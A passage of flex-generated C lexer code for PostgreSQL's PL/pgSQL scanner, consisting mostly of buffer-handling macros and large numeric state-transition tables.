); void *plpgsql_base_yyrealloc (void *,yy_size_t ); void plpgsql_base_yyfree (void * ); #define yy_new_buffer plpgsql_base_yy_create_buffer #define yy_set_interactive(is_interactive) \ { \ if ( ! YY_CURRENT_BUFFER ){ \ plpgsql_base_yyensure_buffer_stack (); \ YY_CURRENT_BUFFER_LVALUE = \ plpgsql_base_yy_create_buffer(plpgsql_base_yyin,YY_BUF_SIZE ); \ } \ YY_CURRENT_BUFFER_LVALUE->yy_is_interactive = is_interactive; \ } #define yy_set_bol(at_bol) \ { \ if ( ! 
YY_CURRENT_BUFFER ){\ plpgsql_base_yyensure_buffer_stack (); \ YY_CURRENT_BUFFER_LVALUE = \ plpgsql_base_yy_create_buffer(plpgsql_base_yyin,YY_BUF_SIZE ); \ } \ YY_CURRENT_BUFFER_LVALUE->yy_at_bol = at_bol; \ } #define YY_AT_BOL() (YY_CURRENT_BUFFER_LVALUE->yy_at_bol) /* Begin user sect3 */ #define plpgsql_base_yywrap(n) 1 #define YY_SKIP_YYWRAP typedef unsigned char YY_CHAR; FILE *plpgsql_base_yyin = (FILE *) 0, *plpgsql_base_yyout = (FILE *) 0; typedef int yy_state_type; extern int plpgsql_base_yylineno; int plpgsql_base_yylineno = 1; extern char *plpgsql_base_yytext; #define yytext_ptr plpgsql_base_yytext static yy_state_type yy_get_previous_state (void ); static yy_state_type yy_try_NUL_trans (yy_state_type current_state ); static int yy_get_next_buffer (void ); static void yy_fatal_error (yyconst char msg[] ); /* Done after the current pattern has been matched and before the * corresponding action - sets up plpgsql_base_yytext. */ #define YY_DO_BEFORE_ACTION \ (yytext_ptr) = yy_bp; \ plpgsql_base_yyleng = (size_t) (yy_cp - yy_bp); \ (yy_hold_char) = *yy_cp; \ *yy_cp = '\0'; \ (yy_c_buf_p) = yy_cp; #define YY_NUM_RULES 94 #define YY_END_OF_BUFFER 95 /* This struct is not used in this scanner, but its presence is necessary. */ struct yy_trans_info { flex_int32_t yy_verify; flex_int32_t yy_nxt; }; static yyconst flex_int16_t yy_accept[373] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 95, 93, 76, 76, 93, 93, 82, 93, 93, 93, 74, 93, 2, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 93, 88, 87, 85, 81, 80, 81, 91, 91, 92, 76, 75, 0, 58, 89, 66, 0, 77, 3, 78, 74, 1, 0, 58, 0, 0, 58, 58, 6, 58, 58, 58, 58, 58, 58, 83, 58, 58, 58, 58, 58, 58, 58, 26, 27, 31, 58, 58, 58, 58, 58, 40, 58, 58, 58, 58, 58, 58, 58, 51, 58, 58, 58, 0, 88, 86, 84, 79, 91, 90, 0, 58, 0, 0, 0, 0, 0, 77, 0, 0, 0, 0, 59, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 18, 58, 58, 58, 58, 23, 58, 25, 58, 58, 58, 32, 58, 58, 0, 36, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 0, 0, 0, 0, 0, 0, 67, 0, 0, 0, 59, 0, 59, 0, 0, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 57, 15, 58, 58, 58, 21, 58, 24, 28, 58, 30, 33, 34, 0, 58, 38, 39, 58, 58, 58, 58, 58, 58, 58, 58, 58, 50, 52, 58, 54, 58, 0, 0, 0, 0, 67, 0, 67, 0, 0, 0, 0, 0, 0, 0, 0, 60, 4, 5, 7, 58, 58, 58, 11, 58, 58, 58, 58, 17, 58, 58, 22, 58, 0, 58, 58, 42, 58, 58, 58, 58, 58, 58, 58, 58, 55, 0, 0, 0, 0, 0, 0, 0, 68, 0, 61, 0, 0, 0, 60, 0, 60, 0, 58, 58, 10, 58, 58, 58, 16, 58, 58, 29, 0, 37, 58, 43, 58, 45, 58, 58, 48, 49, 58, 0, 0, 69, 0, 0, 0, 68, 0, 68, 0, 0, 0, 0, 0, 58, 58, 12, 13, 58, 58, 20, 0, 41, 58, 46, 58, 53, 56, 0, 0, 0, 0, 0, 0, 62, 0, 8, 9, 58, 58, 0, 58, 58, 0, 0, 70, 0, 64, 0, 0, 58, 19, 35, 58, 47, 72, 0, 0, 0, 63, 58, 44, 0, 71, 65, 14, 73, 0 } ; static yyconst flex_int32_t yy_ec[256] = { 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 1, 2, 4, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 5, 6, 7, 8, 1, 9, 1, 1, 10, 1, 1, 11, 12, 13, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 15, 1, 1, 16, 1, 1, 1, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 26, 27, 28, 29, 30, 31, 26, 32, 33, 34, 35, 36, 37, 38, 39, 26, 1, 40, 1, 1, 41, 1, 42, 43, 44, 45, 46, 47, 48, 49, 50, 26, 26, 51, 52, 53, 54, 55, 26, 56, 57, 58, 59, 60, 61, 62, 63, 26, 1, 1, 1, 1, 1, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 
26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26 } ; static yyconst flex_int32_t yy_meta[64] = { 0, 1, 2, 3, 4, 5, 1, 6, 7, 8, 1, 1, 9, 1, 10, 1, 1, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 8, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11 } ; static yyconst flex_int16_t yy_base[399] = { 0, 0, 307, 55, 56, 63, 64, 65, 68, 281, 2417, 74, 77, 79, 76, 2417, 265, 260, 244, 239, 223, 2417, 85, 96, 158, 197, 248, 290, 99, 111, 348, 95, 97, 99, 165, 179, 389, 211, 425, 256, 40, 0, 229, 0, 2417, 2417, 224, 0, 0, 203, 135, 194, 193, 199, 2417, 172, 188, 0, 2417, 2417, 180, 2417, 232, 259, 99, 285, 330, 292, 327, 331, 290, 361, 471, 395, 418, 2417, 412, 384, 527, 469, 454, 388, 504, 493, 503, 539, 540, 577, 593, 539, 473, 600, 607, 597, 642, 621, 628, 642, 647, 653, 684, 701, 691, 54, 0, 2417, 2417, 2417, 0, 2417, 183, 715, 184, 722, 194, 740, 172, 0, 56, 53, 744, 173, 748, 751, 745, 511, 743, 620, 748, 752, 806, 813, 825, 748, 837, 813, 825, 850, 845, 870, 884, 895, 874, 894, 875, 919, 939, 927, 951, 937, 934, 943, 945, 977, 1001, 985, 987, 1004, 1049, 1005, 1041, 1036, 1051, 1045, 1053, 1069, 94, 165, 110, 102, 1109, 158, 1113, 110, 161, 139, 1127, 1134, 1141, 250, 1152, 1118, 1119, 1139, 1165, 1159, 1160, 1189, 1213, 1197, 1141, 1231, 1217, 1224, 1256, 1235, 1270, 1288, 1295, 1302, 1313, 1316, 1327, 1330, 99, 1322, 1346, 1349, 1329, 1346, 1373, 1343, 1396, 1403, 1368, 1386, 1398, 1452, 1459, 1422, 1471, 1432, 181, 168, 210, 116, 1482, 1489, 1496, 344, 1427, 208, 187, 216, 240, 1507, 101, 289, 1511, 1514, 1525, 1528, 1519, 1547, 1559, 1578, 1538, 1548, 1562, 1609, 1620, 1623, 1634, 1637, 253, 1639, 1664, 1689, 1640, 1696, 1622, 1680, 1680, 1684, 1714, 1699, 1747, 291, 290, 228, 329, 328, 1758, 100, 518, 345, 2417, 352, 378, 86, 1762, 551, 677, 380, 1746, 1746, 1780, 1766, 1805, 1773, 1819, 1815, 1816, 1840, 397, 1843, 1865, 1868, 1879, 1882, 1877, 1865, 1901, 1926, 1929, 415, 415, 2417, 424, 432, 64, 1940, 1721, 1904, 433, 444, 542, 307, 543, 1947, 1939, 1959, 1966, 1984, 1949, 2007, 556, 2018, 1977, 2021, 2005, 2037, 2417, 583, 594, 333, 596, 390, 631, 2417, 652, 2051, 2062, 2025, 2039, 663, 2057, 2077, 404, 669, 2417, 707, 2417, 730, 407, 2069, 2096, 2417, 2114, 2121, 2417, 749, 488, 571, 2417, 2098, 2134, 685, 2417, 2417, 2145, 2417, 2417, 2159, 2170, 2181, 2192, 2198, 2208, 2219, 2230, 2241, 2247, 2258, 2264, 2275, 2285, 2291, 2301, 2312, 2322, 2333, 2343, 2353, 2363, 2374, 2384, 2395, 2405 } ; static yyconst flex_int16_t yy_def[399] = { 0, 372, 1, 373, 373, 374, 374, 375, 375, 372, 372, 372, 372, 376, 377, 372, 372, 372, 372, 372, 372, 372, 378, 378, 378, 24, 24, 24, 378, 378, 378, 24, 24, 24, 378, 378, 24, 378, 24, 378, 372, 379, 372, 380, 372, 372, 372, 381, 381, 382, 372, 383, 383, 372, 372, 372, 384, 385, 372, 372, 372, 372, 372, 378, 372, 386, 378, 378, 378, 24, 30, 378, 30, 378, 378, 372, 30, 378, 378, 378, 378, 24, 378, 378, 30, 378, 24, 378, 378, 24, 78, 378, 378, 78, 30, 378, 378, 378, 78, 378, 378, 378, 78, 372, 379, 372, 372, 372, 381, 372, 387, 372, 383, 372, 372, 388, 384, 385, 372, 372, 386, 389, 390, 378, 78, 30, 30, 30, 24, 24, 378, 378, 378, 78, 378, 78, 78, 378, 78, 378, 378, 378, 24, 78, 24, 378, 378, 78, 372, 78, 24, 30, 30, 30, 378, 24, 24, 78, 378, 24, 78, 30, 78, 30, 30, 24, 372, 387, 372, 372, 388, 391, 392, 372, 
372, 389, 372, 372, 390, 372, 393, 30, 30, 78, 378, 78, 24, 378, 378, 24, 30, 378, 78, 30, 378, 24, 378, 378, 378, 378, 378, 378, 378, 378, 372, 78, 378, 378, 24, 78, 378, 24, 378, 378, 78, 24, 78, 378, 378, 78, 378, 78, 372, 372, 372, 391, 372, 372, 392, 372, 394, 372, 372, 372, 372, 393, 395, 396, 378, 378, 378, 378, 30, 378, 378, 378, 24, 24, 30, 378, 378, 378, 378, 378, 372, 78, 378, 378, 78, 378, 30, 30, 24, 24, 378, 30, 378, 372, 372, 372, 372, 372, 394, 397, 398, 372, 372, 372, 372, 395, 372, 372, 396, 372, 30, 24, 378, 78, 378, 30, 378, 78, 78, 378, 372, 378, 378, 378, 378, 378, 78, 24, 378, 378, 378, 372, 372, 372, 372, 372, 397, 372, 372, 398, 372, 372, 372, 372, 372, 378, 78, 378, 378, 378, 24, 378, 372, 378, 24, 378, 30, 378, 372, 372, 372, 372, 372, 372, 372, 372, 372, 378, 378, 78, 30, 372, 78, 378, 372, 372, 372, 372, 372, 372, 372, 78, 378, 372, 378, 378, 372, 372, 372, 372, 372, 30, 378, 372, 372, 372, 378, 372, 0, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372 } ; static yyconst flex_int16_t yy_nxt[2481] = { 0, 10, 11, 12, 11, 13, 10, 14, 10, 15, 10, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 29, 31, 32, 33, 34, 35, 36, 37, 38, 29, 29, 39, 29, 29, 10, 29, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 29, 29, 39, 29, 29, 42, 42, 45, 45, 48, 311, 103, 48, 49, 46, 46, 49, 50, 50, 50, 50, 50, 50, 52, 54, 53, 166, 173, 62, 62, 62, 55, 280, 174, 64, 103, 43, 43, 65, 62, 62, 62, 62, 62, 62, 64, 311, 280, 64, 65, 166, 173, 65, 66, 62, 62, 62, 174, 67, 254, 64, 82, 226, 63, 65, 63, 86, 63, 87, 222, 88, 63, 118, 63, 119, 89, 68, 66, 50, 50, 50, 223, 224, 67, 254, 176, 82, 63, 231, 63, 86, 63, 87, 222, 88, 63, 118, 63, 119, 89, 68, 62, 62, 62, 226, 223, 224, 64, 62, 62, 62, 65, 231, 109, 64, 113, 113, 113, 65, 176, 54, 114, 62, 62, 62, 115, 69, 55, 64, 70, 111, 109, 65, 232, 71, 60, 54, 90, 91, 111, 111, 92, 62, 62, 62, 112, 268, 267, 64, 276, 69, 109, 65, 70, 62, 62, 62, 232, 71, 72, 64, 90, 91, 73, 65, 63, 92, 168, 63, 169, 268, 96, 267, 74, 276, 62, 62, 62, 107, 105, 61, 64, 269, 275, 72, 65, 97, 277, 73, 63, 307, 168, 63, 169, 60, 59, 96, 74, 75, 62, 62, 62, 62, 62, 62, 64, 269, 275, 64, 65, 97, 277, 65, 58, 101, 307, 76, 57, 77, 63, 278, 102, 372, 233, 63, 234, 294, 78, 120, 120, 120, 121, 281, 281, 281, 62, 62, 62, 283, 101, 76, 64, 77, 63, 278, 65, 102, 233, 63, 234, 294, 78, 79, 63, 40, 372, 124, 372, 63, 372, 126, 80, 305, 81, 63, 306, 63, 372, 372, 339, 62, 62, 62, 62, 62, 62, 64, 79, 63, 64, 65, 124, 63, 65, 126, 80, 305, 81, 63, 306, 63, 62, 62, 62, 339, 350, 123, 64, 372, 63, 308, 65, 125, 372, 62, 62, 62, 63, 309, 372, 64, 83, 372, 372, 65, 372, 372, 270, 84, 271, 350, 123, 85, 63, 308, 315, 125, 62, 62, 62, 316, 63, 309, 64, 127, 372, 83, 65, 62, 62, 62, 270, 84, 271, 64, 134, 85, 93, 65, 315, 317, 94, 352, 131, 316, 318, 63, 63, 127, 140, 95, 62, 62, 62, 63, 63, 360, 64, 326, 364, 134, 65, 93, 372, 317, 63, 94, 352, 131, 318, 63, 63, 63, 140, 95, 332, 133, 132, 63, 63, 98, 360, 326, 63, 364, 333, 99, 62, 62, 62, 63, 63, 334, 64, 335, 100, 63, 65, 336, 332, 133, 132, 62, 62, 62, 98, 337, 63, 64, 333, 99, 372, 65, 372, 372, 63, 334, 139, 335, 100, 128, 129, 336, 63, 130, 151, 62, 62, 62, 63, 337, 63, 64, 372, 138, 63, 65, 62, 62, 62, 368, 139, 372, 64, 372, 128, 129, 65, 63, 130, 151, 312, 312, 312, 63, 63, 142, 314, 138, 63, 62, 62, 62, 63, 63, 368, 64, 143, 144, 141, 65, 63, 62, 62, 62, 183, 372, 135, 64, 136, 372, 142, 65, 137, 281, 281, 281, 63, 
372, 63, 283, 143, 144, 141, 145, 63, 372, 150, 63, 183, 63, 146, 135, 372, 136, 63, 63, 338, 137, 372, 62, 62, 62, 340, 345, 372, 64, 372, 372, 145, 65, 150, 63, 369, 63, 146, 148, 148, 148, 63, 63, 338, 64, 62, 62, 62, 65, 340, 345, 64, 62, 62, 62, 65, 147, 348, 64, 63, 369, 63, 65, 372, 372, 153, 62, 62, 62, 372, 149, 349, 64, 62, 62, 62, 65, 372, 351, 64, 147, 348, 152, 65, 63, 63, 63, 62, 62, 62, 153, 372, 63, 64, 149, 349, 186, 65, 62, 62, 62, 158, 351, 159, 64, 372, 152, 63, 65, 63, 63, 161, 372, 353, 154, 63, 63, 160, 155, 156, 186, 157, 281, 281, 281, 158, 354, 159, 283, 62, 62, 62, 63, 357, 63, 64, 161, 353, 154, 65, 63, 160, 155, 156, 372, 157, 62, 62, 62, 371, 354, 361, 64, 63, 372, 164, 65, 357, 162, 165, 62, 62, 62, 112, 372, 372, 64, 113, 113, 113, 65, 372, 372, 114, 371, 361, 163, 115, 63, 372, 164, 362, 162, 372, 165, 170, 170, 170, 171, 120, 120, 120, 121, 177, 177, 177, 62, 62, 62, 179, 163, 372, 64, 180, 363, 362, 65, 63, 63, 63, 63, 181, 192, 182, 372, 63, 193, 372, 63, 184, 185, 63, 188, 367, 372, 63, 187, 372, 363, 372, 63, 372, 63, 63, 63, 63, 181, 192, 182, 63, 372, 193, 63, 184, 185, 63, 188, 367, 372, 63, 187, 62, 62, 62, 63, 372, 372, 64, 62, 62, 62, 65, 372, 372, 64, 372, 189, 372, 65, 372, 62, 62, 62, 372, 372, 63, 64, 194, 372, 190, 65, 63, 62, 62, 62, 372, 372, 195, 64, 63, 372, 189, 65, 63, 372, 62, 62, 62, 372, 191, 63, 64, 194, 372, 190, 65, 63, 197, 372, 63, 372, 372, 195, 63, 63, 62, 62, 62, 63, 372, 372, 64, 372, 191, 372, 65, 372, 196, 372, 62, 62, 62, 197, 372, 63, 64, 372, 372, 63, 65, 62, 62, 62, 372, 63, 63, 64, 199, 201, 372, 65, 196, 63, 63, 372, 198, 63, 372, 200, 372, 372, 372, 63, 372, 62, 62, 62, 372, 63, 63, 64, 199, 201, 372, 65, 372, 63, 63, 372, 198, 372, 63, 372, 200, 62, 62, 62, 63, 372, 63, 64, 203, 372, 372, 65, 63, 148, 148, 148, 63, 372, 63, 64, 372, 206, 205, 65, 63, 63, 372, 208, 372, 63, 202, 63, 207, 203, 63, 372, 63, 63, 63, 372, 372, 63, 372, 63, 204, 206, 372, 205, 63, 372, 63, 372, 208, 63, 202, 372, 207, 372, 63, 63, 63, 372, 63, 62, 62, 62, 63, 372, 204, 64, 209, 372, 63, 65, 63, 63, 372, 63, 210, 372, 211, 372, 212, 63, 63, 213, 372, 372, 372, 63, 63, 372, 63, 372, 209, 215, 63, 372, 63, 63, 63, 63, 372, 210, 211, 372, 212, 372, 63, 372, 213, 62, 62, 62, 63, 372, 63, 64, 63, 215, 63, 65, 63, 372, 63, 217, 216, 63, 372, 63, 63, 372, 218, 372, 219, 63, 63, 372, 63, 372, 372, 372, 220, 63, 372, 63, 63, 63, 372, 217, 214, 216, 63, 63, 372, 63, 221, 218, 219, 63, 63, 63, 63, 372, 63, 372, 220, 372, 372, 372, 63, 170, 170, 170, 171, 227, 227, 227, 372, 372, 221, 229, 372, 63, 372, 230, 372, 372, 63, 177, 177, 177, 121, 372, 372, 179, 177, 177, 177, 180, 63, 63, 179, 177, 177, 177, 180, 63, 239, 179, 372, 238, 63, 180, 235, 235, 235, 236, 63, 372, 240, 372, 372, 63, 63, 63, 63, 62, 62, 62, 247, 63, 239, 64, 63, 238, 63, 65, 63, 372, 63, 372, 372, 63, 242, 240, 372, 63, 63, 63, 243, 62, 62, 62, 247, 63, 372, 64, 63, 241, 372, 65, 372, 63, 372, 63, 372, 372, 372, 242, 372, 63, 244, 372, 243, 62, 62, 62, 372, 63, 372, 64, 372, 241, 63, 65, 372, 63, 372, 372, 245, 372, 246, 62, 62, 62, 63, 244, 63, 64, 372, 372, 248, 65, 372, 372, 249, 372, 63, 372, 372, 63, 372, 63, 372, 245, 246, 63, 62, 62, 62, 63, 63, 63, 64, 63, 372, 248, 65, 372, 251, 249, 62, 62, 62, 372, 372, 63, 64, 372, 372, 63, 65, 372, 372, 372, 63, 250, 372, 63, 62, 62, 62, 372, 251, 372, 64, 62, 62, 62, 65, 372, 372, 64, 62, 62, 62, 65, 372, 372, 64, 250, 252, 372, 65, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 372, 65, 62, 62, 62, 62, 62, 62, 64, 372, 252, 
64, 65, 372, 255, 65, 63, 372, 253, 372, 63, 62, 62, 62, 62, 62, 62, 64, 372, 63, 64, 65, 256, 372, 65, 372, 372, 63, 63, 255, 257, 63, 253, 259, 63, 63, 63, 372, 62, 62, 62, 63, 372, 63, 64, 372, 256, 372, 65, 372, 262, 63, 63, 63, 372, 257, 63, 259, 372, 63, 63, 62, 62, 62, 258, 63, 372, 64, 62, 62, 62, 65, 372, 372, 64, 262, 263, 63, 65, 63, 264, 63, 63, 372, 63, 372, 63, 372, 258, 372, 372, 260, 272, 272, 272, 273, 372, 372, 261, 372, 263, 372, 372, 63, 63, 264, 63, 63, 63, 372, 265, 63, 372, 372, 63, 260, 266, 62, 62, 62, 63, 372, 261, 64, 62, 62, 62, 65, 372, 63, 64, 63, 372, 372, 65, 265, 62, 62, 62, 63, 372, 266, 64, 372, 372, 63, 65, 227, 227, 227, 171, 372, 372, 229, 227, 227, 227, 230, 372, 372, 229, 227, 227, 227, 230, 372, 372, 229, 372, 372, 372, 230, 235, 235, 235, 236, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 372, 65, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 372, 65, 63, 372, 372, 372, 284, 372, 372, 285, 62, 62, 62, 63, 372, 372, 64, 372, 372, 372, 65, 372, 62, 62, 62, 372, 288, 63, 64, 63, 372, 284, 65, 285, 63, 372, 63, 63, 372, 289, 286, 62, 62, 62, 63, 290, 372, 64, 372, 372, 288, 65, 63, 63, 372, 372, 63, 372, 63, 372, 63, 372, 372, 289, 286, 372, 372, 372, 63, 372, 290, 287, 62, 62, 62, 372, 63, 372, 64, 372, 63, 372, 65, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 287, 65, 62, 62, 62, 62, 62, 62, 64, 372, 63, 64, 65, 372, 372, 65, 372, 299, 372, 372, 291, 63, 372, 292, 63, 63, 295, 297, 372, 372, 63, 63, 62, 62, 62, 63, 372, 293, 64, 372, 372, 299, 65, 372, 291, 63, 372, 292, 372, 63, 63, 295, 297, 372, 372, 63, 63, 62, 62, 62, 372, 293, 296, 64, 62, 62, 62, 65, 63, 372, 64, 372, 372, 63, 65, 63, 301, 302, 372, 300, 63, 63, 62, 62, 62, 63, 296, 63, 64, 312, 312, 312, 65, 63, 304, 314, 298, 63, 63, 63, 301, 302, 372, 300, 63, 63, 372, 372, 372, 63, 372, 372, 63, 372, 303, 62, 62, 62, 304, 372, 298, 64, 63, 372, 372, 65, 272, 272, 272, 273, 281, 281, 281, 236, 63, 372, 283, 372, 303, 63, 372, 319, 63, 372, 372, 63, 372, 320, 62, 62, 62, 63, 372, 321, 64, 372, 372, 63, 65, 63, 372, 63, 372, 63, 372, 319, 63, 372, 63, 63, 372, 320, 323, 62, 62, 62, 63, 372, 321, 64, 372, 372, 63, 65, 372, 372, 63, 62, 62, 62, 372, 372, 63, 64, 372, 372, 323, 65, 372, 372, 63, 63, 63, 325, 372, 322, 324, 63, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 372, 65, 372, 372, 372, 63, 63, 63, 325, 322, 372, 324, 63, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 372, 65, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 63, 327, 65, 63, 63, 372, 329, 372, 330, 372, 63, 62, 62, 62, 312, 312, 312, 64, 372, 372, 314, 65, 372, 372, 63, 327, 372, 63, 328, 63, 372, 329, 330, 372, 372, 63, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 372, 65, 312, 312, 312, 273, 372, 372, 314, 62, 62, 62, 331, 372, 372, 64, 372, 372, 63, 65, 342, 62, 62, 62, 63, 372, 372, 64, 62, 62, 62, 65, 372, 372, 64, 372, 63, 331, 65, 344, 372, 341, 372, 63, 63, 342, 62, 62, 62, 63, 372, 372, 64, 372, 372, 372, 65, 372, 372, 372, 63, 372, 372, 344, 63, 341, 372, 346, 63, 62, 62, 62, 63, 372, 372, 64, 372, 372, 343, 65, 62, 62, 62, 62, 62, 62, 64, 63, 63, 64, 65, 346, 372, 65, 347, 372, 63, 372, 63, 62, 62, 62, 343, 372, 63, 64, 63, 372, 372, 65, 355, 372, 63, 62, 62, 62, 372, 372, 347, 64, 372, 63, 63, 65, 62, 62, 62, 372, 356, 63, 64, 63, 63, 372, 65, 355, 63, 372, 63, 62, 62, 62, 358, 372, 372, 64, 63, 372, 365, 65, 63, 372, 356, 372, 63, 372, 63, 372, 62, 62, 62, 63, 372, 63, 64, 372, 372, 358, 65, 372, 372, 359, 372, 365, 372, 63, 62, 62, 62, 63, 63, 372, 64, 62, 62, 62, 65, 63, 372, 
64, 372, 370, 372, 65, 366, 359, 62, 62, 62, 372, 372, 372, 64, 372, 372, 63, 65, 62, 62, 62, 372, 63, 372, 64, 372, 370, 372, 65, 372, 366, 41, 41, 41, 41, 41, 41, 41, 41, 41, 41, 41, 44, 44, 44, 44, 44, 44, 44, 44, 44, 44, 44, 47, 47, 47, 47, 47, 47, 47, 47, 47, 47, 47, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 56, 372, 372, 372, 56, 56, 63, 63, 63, 372, 63, 63, 372, 63, 63, 63, 104, 104, 104, 104, 104, 104, 104, 372, 104, 104, 104, 106, 106, 372, 106, 106, 106, 106, 106, 106, 106, 106, 108, 108, 108, 108, 108, 372, 108, 108, 108, 108, 108, 110, 372, 372, 372, 372, 110, 52, 52, 52, 52, 52, 52, 52, 52, 52, 52, 52, 116, 372, 372, 372, 116, 116, 117, 117, 372, 372, 117, 117, 117, 117, 117, 117, 117, 122, 122, 122, 122, 372, 372, 372, 372, 372, 122, 167, 372, 372, 372, 167, 167, 172, 172, 172, 172, 372, 372, 372, 372, 372, 172, 175, 175, 175, 175, 175, 175, 175, 175, 175, 175, 175, 178, 178, 178, 372, 178, 178, 372, 178, 178, 178, 225, 225, 225, 225, 225, 225, 225, 225, 225, 225, 225, 228, 228, 228, 372, 228, 228, 372, 228, 228, 228, 237, 237, 237, 237, 372, 372, 372, 372, 372, 237, 274, 274, 274, 274, 372, 372, 372, 372, 372, 274, 279, 279, 279, 279, 279, 279, 279, 279, 279, 279, 279, 282, 282, 282, 372, 282, 282, 372, 372, 282, 282, 310, 310, 310, 310, 310, 310, 310, 310, 310, 310, 310, 313, 313, 313, 372, 313, 313, 372, 372, 313, 313, 9, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372 } ; static yyconst flex_int16_t yy_chk[2481] = { 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 4, 5, 6, 7, 310, 40, 8, 7, 5, 6, 8, 11, 11, 11, 12, 12, 12, 13, 14, 13, 103, 118, 22, 22, 22, 14, 279, 119, 22, 40, 3, 4, 22, 23, 23, 23, 28, 28, 28, 23, 273, 236, 28, 23, 103, 118, 28, 22, 29, 29, 29, 119, 23, 204, 29, 28, 225, 31, 29, 32, 31, 33, 32, 166, 33, 31, 64, 32, 64, 33, 23, 22, 50, 50, 50, 168, 169, 23, 204, 175, 28, 31, 173, 32, 31, 33, 32, 166, 33, 31, 64, 32, 64, 33, 23, 24, 24, 24, 171, 168, 169, 24, 34, 34, 34, 24, 173, 167, 34, 55, 55, 55, 34, 121, 116, 55, 35, 35, 35, 55, 24, 55, 35, 24, 112, 110, 35, 174, 24, 60, 56, 34, 34, 52, 51, 35, 53, 53, 53, 53, 223, 222, 53, 232, 24, 49, 53, 24, 37, 37, 37, 174, 24, 25, 37, 34, 34, 25, 37, 25, 35, 114, 25, 114, 223, 37, 222, 25, 232, 62, 62, 62, 46, 42, 20, 62, 224, 231, 25, 62, 37, 233, 25, 25, 269, 114, 25, 114, 19, 18, 37, 25, 26, 39, 39, 39, 63, 63, 63, 39, 224, 231, 63, 39, 37, 233, 63, 17, 39, 269, 26, 16, 26, 26, 234, 39, 9, 179, 26, 179, 254, 26, 65, 65, 65, 65, 237, 237, 237, 67, 67, 67, 237, 39, 26, 67, 26, 26, 234, 67, 39, 179, 26, 179, 254, 26, 27, 70, 2, 0, 67, 0, 27, 0, 70, 27, 267, 27, 70, 268, 27, 0, 0, 317, 68, 68, 68, 66, 66, 66, 68, 27, 70, 66, 68, 67, 27, 66, 70, 27, 267, 27, 70, 268, 27, 30, 30, 30, 317, 335, 66, 30, 0, 69, 270, 30, 69, 0, 71, 71, 71, 69, 271, 0, 71, 30, 0, 0, 71, 0, 0, 229, 30, 229, 335, 66, 30, 69, 270, 275, 69, 77, 77, 77, 277, 69, 271, 77, 71, 0, 30, 77, 73, 73, 73, 229, 30, 229, 73, 77, 30, 36, 73, 275, 278, 36, 337, 73, 277, 283, 81, 36, 71, 81, 36, 74, 74, 74, 81, 36, 348, 74, 294, 354, 77, 74, 36, 0, 278, 76, 36, 337, 73, 283, 81, 36, 76, 81, 36, 305, 76, 74, 81, 36, 38, 348, 294, 38, 354, 306, 38, 
